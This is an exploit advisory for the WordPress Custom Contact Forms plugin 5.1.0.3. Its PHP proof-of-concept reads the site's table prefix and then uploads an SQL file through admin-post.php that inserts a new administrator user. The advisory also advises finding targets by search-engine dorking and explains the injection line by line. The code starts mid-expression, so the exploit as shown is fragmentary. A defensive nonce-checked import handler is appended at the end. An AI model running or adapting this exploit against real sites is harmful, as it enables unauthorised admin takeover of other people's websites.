=============================================================================================================================================
| # Title     : WordPress Custom contact forms Plugin v 5.1.0.3 CSRF / SQL Injection |
| # Author    : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor    : https://wordpress.org/ |
=============================================================================================================================================

POC :

[+] Dorking in Google or other search engines.
[+] Code Description: This code attempts to exploit a vulnerability in WordPress to add a new admin user.
    (linked: https://packetstorm.news/files/id/180885/ Linked CVE numbers: ),
[+] Save the code as poc.php.
[+] Line 70: set your user & pass
[+] Usage : http://127.0.0.1/poc.php
[+] PayLoad :

'1' ]);
$opts = ['http' => ['method' => 'POST', 'content' => $postdata]];
$context = stream_context_create($opts);
$response = file_get_contents($export_url, false, $context);
// The export output names the plugin's fields table; its prefix is the site's table prefix.
if (!$response || !preg_match('/insert into `(.+_)customcontactforms_fields`/i', $response, $matches)) {
    return null;
}
return $matches[1];
}

$table_prefix = getTablePrefix($target);
if (!$table_prefix) {
    echo "تعذر الحصول على بادئة الجدول!"; // "Could not obtain the table prefix!"
    exit;
}

$sql = "INSERT INTO {$table_prefix}users (user_login, user_pass) VALUES ('$username', MD5('$password')); INSERT INTO {$table_prefix}usermeta (user_id, meta_key, meta_value) VALUES ((SELECT id FROM {$table_prefix}users WHERE user_login='$username'), '{$table_prefix}capabilities', 'a:1:{s:13:\"administrator\";b:1;}');";

// Build a multipart/form-data body: the SQL goes in as the uploaded "import_file".
$boundary = md5(time());
$data  = "--$boundary\r\n";
$data .= "Content-Disposition: form-data; name=\"import_file\"; filename=\"exploit.sql\"\r\n";
$data .= "Content-Type: text/plain\r\n\r\n";
$data .= "$sql\r\n";
$data .= "--$boundary\r\n";
$data .= "Content-Disposition: form-data; name=\"ccf_merge_import\"\r\n\r\n1\r\n";
$data .= "--$boundary--\r\n";

$opts = ['http' => ['method' => 'POST', 'header' => "Content-Type: multipart/form-data; boundary=$boundary", 'content' => $data]];
$context = stream_context_create($opts);
$result = file_get_contents("$target/wp-admin/admin-post.php", false, $context);
if ($result) {
    echo "تم إنشاء مستخدم جديد بنجاح!"; // "New user created successfully!"
    echo "indoushka: $username";
    echo "packet2025strom: $password";
} else {
    echo "فشل في تنفيذ الهجوم!"; // "Failed to carry out the attack!"
}
}
?>

Exploiting a WordPress vulnerability

Exploiting a WordPress vulnerability - custom-contact-forms

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

Explanation:

1. SQL Injection in the Code:

The key part that exploits SQL Injection is this line:

$sql = "INSERT INTO {$table_prefix}users (user_login, user_pass) VALUES ('$username', MD5('$password')); INSERT INTO {$table_prefix}usermeta (user_id, meta_key, meta_value) VALUES ((SELECT id FROM {$table_prefix}users WHERE user_login='$username'), '{$table_prefix}capabilities', 'a:1:{s:13:\"administrator\";b:1;}');";

SQL Injection is leveraged here in two ways:

Dynamic Table Prefix: The $table_prefix variable is obtained dynamically from the vulnerable WordPress site by exploiting the "Custom Contact Forms" plugin (the prefix is read out of its export output). With this prefix, the attacker injects the site's real table names into the SQL query. This matters because WordPress installations use different table prefixes (wp_, wp123_, etc.), so recovering the prefix lets the attack target any WordPress installation regardless of its configuration.

User and Meta Insertions: The attacker inserts values for the user_login and user_pass columns of the users table and inserts the capabilities metadata for that user into the usermeta table. Arbitrary values for user_login, user_pass and meta_value go directly into the SQL query, allowing the creation of a user with administrator privileges. Specifically, this line:

INSERT INTO {$table_prefix}users (user_login, user_pass) VALUES ('$username', MD5('$password'));

The attacker controls the $username and $password values (generating them randomly), ensuring that a new admin user is created.

And this line:

INSERT INTO {$table_prefix}usermeta (user_id, meta_key, meta_value) VALUES ((SELECT id FROM {$table_prefix}users WHERE user_login='$username'), '{$table_prefix}capabilities', 'a:1:{s:13:\"administrator\";b:1;}');

2. CSRF (Cross-Site Request Forgery):

CSRF comes into play because the attacker exploits the WordPress site's functionality by sending a POST request to it without the target user's knowledge or consent. The attacker crafts a malicious request (carrying the SQL injection and the user-creation data) and sends it to the WordPress site via the admin-post.php endpoint. The request is sent through an HTML form (the form in the provided code), and the attacker only needs the target website's URL. If a logged-in WordPress user opens this malicious page, it triggers the creation of the new user with admin privileges. The code uses file_get_contents() to send the POST request to the wp-admin/admin-post.php endpoint. The attacker bypasses any CSRF protections (such as WordPress nonces) that could otherwise prevent this attack.
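As an added defensive counterpart, not code from the advisory or from the Custom Contact Forms plugin: a WordPress admin-post import handler that enforces the two controls the explanation says this attack gets around, a capability check and a nonce check, and that never hands uploaded file contents to the database as SQL. The action name, nonce name, form field names and the label/type columns are assumptions for illustration; only the customcontactforms_fields table name comes from the advisory.

```php
<?php
// Added example, not the plugin's or the advisory author's code. The action,
// nonce and form-field names, and the column names label/type, are assumed.
add_action( 'admin_post_ccf_hardened_import', 'ccf_hardened_import_handler' );

function ccf_hardened_import_handler() {
    global $wpdb;
    // Authorisation: only users who may manage the site can import.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges.', 403 );
    }

    // CSRF: the request must carry a nonce minted for this action. The form
    // that posts here must include wp_nonce_field( 'ccf_import', 'ccf_import_nonce' ).
    check_admin_referer( 'ccf_import', 'ccf_import_nonce' );

    // Input: accept structured data (a JSON array of rows), never raw SQL.
    if ( empty( $_FILES['import_file']['tmp_name'] ) ) {
        wp_die( 'No import file supplied.', 400 );
    }
    $rows = json_decode( file_get_contents( $_FILES['import_file']['tmp_name'] ), true );
    if ( ! is_array( $rows ) ) {
        wp_die( 'Import file must be a JSON array of field rows.', 400 );
    }

    // Writes go through $wpdb->insert with a fixed table name and typed
    // placeholders, so file contents cannot pick the table or append statements.
    $table = $wpdb->prefix . 'customcontactforms_fields';
    $count = 0;
    foreach ( $rows as $row ) {
        if ( ! isset( $row['label'], $row['type'] ) ) {
            continue; // skip malformed rows rather than guessing
        }
        $ok = $wpdb->insert(
            $table,
            array(
                'label' => sanitize_text_field( $row['label'] ),
                'type'  => sanitize_key( $row['type'] ),
            ),
            array( '%s', '%s' )
        );
        if ( false !== $ok ) {
            $count++;
        }
    }

    wp_safe_redirect( add_query_arg( 'ccf_imported', $count, admin_url() ) );
    exit;
}
```

With these checks in place, a forged cross-site POST to admin-post.php fails the nonce check before any file is read, and an uploaded .sql file is rejected as malformed JSON rather than executed.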